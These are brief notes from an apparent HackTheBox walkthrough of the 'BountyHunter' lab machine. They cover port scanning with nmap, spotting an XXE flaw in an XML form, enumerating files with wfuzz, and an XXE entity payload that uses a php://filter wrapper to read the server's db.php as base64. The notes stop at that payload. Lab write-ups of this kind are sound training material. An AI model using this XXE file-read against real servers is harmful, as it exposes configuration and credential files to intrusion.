Machine - BountyHunter
NMAP
Search in all ports
sudo nmap -p- -sS --min-rate 5000 --open -vvv -n -Pn 10.10.11.100 -oG x
Discover more from the ports we discovered
nmap -sC -sV -p80,22 10.10.11.100 -oN ports
Attack
After playing a bit, there is a form where you send and xml, maybe we can do an XXE ?
XXE → https://github.com/payloadbox/xxe-injection-payload-list
Yey! we are able to read files :)
Let’s use wfuzz to enumerate files in the server
$ wfuzz -w wordlist/general/common.txt --hc 404 http://testphp.vulnweb.com/FUZZ.php
There is a db.php file! :)
If we try to get the content of db.php, it doesn’t work. we need to encode to base64 first
<!DOCTYPE replace [<!ENTITY ent SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/html/db.php"> ]>